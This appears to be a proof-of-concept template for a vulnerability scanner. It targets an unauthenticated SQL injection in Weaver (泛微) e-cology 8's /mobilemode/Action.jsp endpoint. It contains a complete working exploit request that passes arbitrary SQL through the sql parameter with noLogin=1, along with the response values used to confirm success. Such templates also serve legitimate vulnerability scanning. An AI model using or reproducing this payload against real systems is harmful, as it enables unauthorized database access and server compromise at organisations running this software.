<DudePoc_Name>泛微 e-cology 8 Action.jsp SQL注入漏洞</DudePoc_Name>
<DudePoc_Description>上海泛微网络科技股份有限公司 泛微 e-cology 8 /mobilemode/Action.jsp 中 sql 参数过滤不严，攻击者可获取数据库信息和服务权限。</DudePoc_Description>
<DudePoc_SetHeader>
GET /mobilemode/Action.jsp?invoker=com.weaver.formmodel.mobile.mec.servlet.MECAdminAction&action=getDatasBySQL&datasource=&sql=select sys.fn_sqlvarbasetostr(HASHBYTES('MD5','123456'))&noLogin=1 HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>0xe10adc3949</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode></DudePoc_AttackCode>
